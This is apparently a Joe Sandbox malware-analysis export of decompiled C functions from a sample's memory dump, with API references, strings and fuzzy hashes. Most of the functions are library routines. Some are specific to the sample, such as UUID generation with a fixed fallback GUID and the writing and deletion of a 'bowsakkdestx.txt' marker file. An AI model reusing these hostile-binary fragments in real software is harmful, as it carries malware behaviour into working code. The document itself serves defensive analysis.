Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write
String ID: A
API String ID: 3115901604-2078354741
Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t10 = _t34 + 1; // 0x1
							_t39 = _t10;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4 ref: 0040C5DA
UuidToStringA.RPCRT4 ref: 0040C5F6
RpcStringFreeA.RPCRT4 ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

OCP, xrefs: 00437A4F
ACP, xrefs: 00437A3E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc = E0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32 ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427908 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00427908(intOrPtr _a4) {
				intOrPtr _t2;

				_t2 = E00428AF7(4);
				__imp__DecodePointer( *0x510444);
				__imp__EncodePointer(_a4);
				 *0x510444 = _t2;
				E00428C81(4);
				return _t2;
			}

0x0042790e
0x0042791a
0x00427925
0x0042792d
0x00427932
0x0042793c

APIs

__lock.LIBCMT ref: 0042790E

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22

DecodePointer.KERNEL32 ref: 0042791A
EncodePointer.KERNEL32(?), ref: 00427925

Part of subcall function 00428C81: LeaveCriticalSection.KERNEL32(?,00428C46,0000000A,00428C36,00507BD0,00000008,00428B0E,00000000,00000000,?,004250D7,0000000D), ref: 00428C8E

Strings

0Ow`R, xrefs: 0042791A

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CriticalPointerSection$DecodeEncodeEnterLeave__lock__mtinitlocknum
String ID: 0Ow`R
API String ID: 2625109469-1688033838
Opcode ID: b96d3330f69780de5e94f0a7477cc2ac5a9ca5dabebc68f4c0891483ae9c0b78
Instruction ID: a7f293a9869467cd648e1b6588198978681150ad1574794750a712bc614af536
Opcode Fuzzy Hash: b96d3330f69780de5e94f0a7477cc2ac5a9ca5dabebc68f4c0891483ae9c0b78
Instruction Fuzzy Hash: C2D05B72A412146BDE402BE5FC4E9883F58D714761F00406BF70CC61A1DEF54840979D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(E004CAA30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
